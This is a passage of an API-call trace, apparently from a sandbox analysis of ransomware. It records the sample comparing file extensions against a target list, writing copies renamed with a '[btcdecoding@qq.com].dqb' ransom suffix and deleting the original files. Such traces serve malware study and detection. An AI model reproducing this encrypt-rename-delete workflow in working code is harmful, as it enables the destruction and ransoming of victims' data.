(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.554] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=5088) returned 1 [0047.555] CloseHandle (hObject=0x160) returned 1 [0047.555] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png")) returned 0x20 [0047.561] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.562] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.567] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 90 [0047.568] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 90 [0047.568] lstrlenW (lpString=".doc") returned 4 [0047.568] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0047.568] lstrlenW (lpString=".docx") returned 5 [0047.573] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0047.575] lstrlenW (lpString=".pdf") returned 4 [0047.575] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0047.575] lstrlenW (lpString=".xls") returned 4 [0047.575] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0047.575] lstrlenW (lpString=".xlsx") returned 5 [0047.576] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0047.581] lstrlenW (lpString=".ppt") returned 4 [0047.582] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0047.582] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 90 [0047.582] lstrlenW (lpString=".zip") returned 4 [0047.582] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0047.582] lstrlenW (lpString=".rar") returned 4 [0047.582] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0047.583] lstrlenW (lpString=".bz2") returned 4 [0047.587] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0047.589] lstrlenW (lpString=".7z") returned 3 [0047.589] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0047.589] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 90 [0047.589] lstrlenW (lpString=".dbf") returned 4 [0047.589] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0047.869] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0047.869] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.491] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.491] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.491] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.492] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.492] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.493] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.493] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.494] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.494] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.494] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0048.510] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.510] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0048.511] GetLastError () returned 0x0 [0048.511] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x4360, lpOverlapped=0x0) returned 1 [0048.512] WriteFile (in: hFile=0x168, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x4370, lpOverlapped=0x0) returned 1 [0048.513] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.514] WriteFile (in: hFile=0x168, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0048.514] SetEndOfFile (hFile=0x168) returned 1 [0048.514] CloseHandle (hObject=0x168) returned 1 [0048.514] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.514] SetEndOfFile (hFile=0x174) returned 1 [0048.515] CloseHandle (hObject=0x174) returned 1 [0048.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0048.515] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl")) returned 1 [0048.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.515] lstrlenW (lpString=".doc") returned 4 [0048.515] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0048.515] lstrlenW (lpString=".docx") returned 5 [0048.515] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0048.515] lstrlenW (lpString=".pdf") returned 4 [0048.515] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0048.515] lstrlenW (lpString=".xls") returned 4 [0048.515] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0048.515] lstrlenW (lpString=".xlsx") returned 5 [0048.515] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0048.515] lstrlenW (lpString=".ppt") returned 4 [0048.516] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString=".zip") returned 4 [0048.516] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0048.516] lstrlenW (lpString=".rar") returned 4 [0048.516] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString=".bz2") returned 4 [0048.516] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString=".7z") returned 3 [0048.516] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString=".dbf") returned 4 [0048.516] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString=".1cd") returned 4 [0048.516] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString=".jpg") returned 4 [0048.516] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString=".doc") returned 4 [0048.516] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString=".docx") returned 5 [0048.516] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0048.516] lstrlenW (lpString=".pdf") returned 4 [0048.516] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString=".xls") returned 4 [0048.516] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString=".xlsx") returned 5 [0048.516] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0048.516] lstrlenW (lpString=".ppt") returned 4 [0048.516] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.516] lstrlenW (lpString=".zip") returned 4 [0048.516] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0048.517] lstrlenW (lpString=".rar") returned 4 [0048.517] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0048.517] lstrlenW (lpString=".bz2") returned 4 [0048.517] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0048.517] lstrlenW (lpString=".7z") returned 3 [0048.517] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.517] lstrlenW (lpString=".dbf") returned 4 [0048.517] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.517] lstrlenW (lpString=".1cd") returned 4 [0048.517] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0048.517] lstrlenW (lpString=".jpg") returned 4 [0048.517] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0048.517] lstrcmpiW (lpString1=".xsl", lpString2=".dqb") returned 1 [0048.517] lstrlenW (lpString="as90.xsl") returned 8 [0048.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0048.518] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=18738) returned 1 [0048.518] CloseHandle (hObject=0x174) returned 1 [0048.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 0x20 [0048.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0048.518] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.518] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0048.519] GetLastError () returned 0x0 [0048.519] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x4932, lpOverlapped=0x0) returned 1 [0048.520] WriteFile (in: hFile=0x168, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x4940, lpOverlapped=0x0) returned 1 [0048.522] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.522] WriteFile (in: hFile=0x168, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0048.522] SetEndOfFile (hFile=0x168) returned 1 [0048.522] CloseHandle (hObject=0x168) returned 1 [0048.522] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.522] SetEndOfFile (hFile=0x174) returned 1 [0048.523] CloseHandle (hObject=0x174) returned 1 [0048.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0048.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 1 [0048.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0048.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0048.523] lstrlenW (lpString=".doc") returned 4 [0048.523] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0048.523] lstrlenW (lpString=".docx") returned 5 [0048.523] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0048.523] lstrlenW (lpString=".pdf") returned 4 [0048.523] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0048.523] lstrlenW (lpString=".xls") returned 4 [0048.523] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0048.523] lstrlenW (lpString=".xlsx") returned 5 [0048.523] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0048.523] lstrlenW (lpString=".ppt") returned 4 [0048.524] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0048.524] lstrlenW (lpString=".zip") returned 4 [0048.524] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0048.524] lstrlenW (lpString=".rar") returned 4 [0048.524] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0048.524] lstrlenW (lpString=".bz2") returned 4 [0048.524] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0048.524] lstrlenW (lpString=".7z") returned 3 [0048.524] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0048.524] lstrlenW (lpString=".dbf") returned 4 [0048.524] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0048.524] lstrlenW (lpString=".1cd") returned 4 [0048.524] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0048.524] lstrlenW (lpString=".jpg") returned 4 [0048.524] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0049.141] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=30948) returned 1 [0049.146] CloseHandle (hObject=0x224) returned 1 [0049.155] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 0x20 [0049.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0049.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0049.175] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.175] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.176] GetLastError () returned 0x0 [0049.176] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x78e4, lpOverlapped=0x0) returned 1 [0049.177] WriteFile (in: hFile=0x200, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x78f0, lpOverlapped=0x0) returned 1 [0049.179] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.179] WriteFile (in: hFile=0x200, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.179] SetEndOfFile (hFile=0x200) returned 1 [0049.179] CloseHandle (hObject=0x200) returned 1 [0049.179] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 